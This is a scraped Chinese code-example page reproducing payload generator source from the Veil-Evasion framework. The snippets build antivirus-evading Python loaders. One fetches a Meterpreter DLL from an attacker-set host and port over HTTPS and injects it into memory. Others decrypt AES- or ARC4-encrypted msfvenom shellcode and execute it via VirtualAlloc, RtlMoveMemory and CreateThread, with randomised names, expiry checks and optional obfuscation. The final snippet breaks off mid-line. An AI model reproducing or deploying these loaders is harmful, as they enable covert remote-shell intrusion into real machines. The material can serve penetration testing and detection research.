                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
#.........这里部分代码省略.........
开发者ID:Veil-Framework,项目名称:Veil-Evasion,代码行数:101,代码来源:stallion.py


示例11: generate

    def generate(self):
    
        payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"

        # randomize everything, yo'
        sumMethodName = helpers.randomString()
        checkinMethodName = helpers.randomString()

        randLettersName = helpers.randomString()
        randLetterSubName = helpers.randomString()
        randBaseName = helpers.randomString()

        downloadMethodName = helpers.randomString()
        hostName = helpers.randomString()
        portName = helpers.randomString()
        requestName = helpers.randomString()
        responseName = helpers.randomString()

        injectMethodName = helpers.randomString()
        dataName = helpers.randomString()
        byteArrayName = helpers.randomString()
        ptrName = helpers.randomString()
        bufName = helpers.randomString()
        handleName = helpers.randomString()
        data2Name = helpers.randomString()

        # helper method that returns the sum of all ord values in a string % 0x100
        payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
        
        # method that generates a new checksum value for checkin to the meterpreter handler
        payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
        payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
        payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
        payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
        payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
        
        # method that connects to a host/port over https and downloads the hosted data
        payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
        payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName)
        payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName)
        payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName)
        payloadCode += "\tif %s.status == 200: return %s.read()\n" %(responseName, responseName)
        payloadCode += "\telse: return \"\"\n"

        # method to inject a reflective .dll into memory
        payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
        payloadCode += "\tif %s != \"\":\n" %(dataName)
        payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
        
        # download the metpreter .dll and inject it
        payloadCode += "%s = ''\n" %(data2Name)
        payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
        payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
开发者ID:0x0mar,项目名称:Veil-Evasion,代码行数:63,代码来源:rev_https.py


示例12: generate

    def generate(self):
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":
        
                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                
                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
        
                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'import ctypes\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        
                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                
                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
        
                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'import ctypes\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ct 

鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Python helpers.color函数代码示例发布时间:2022-05-27
下一篇:
Python common.showerror函数代码示例发布时间:2022-05-27
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap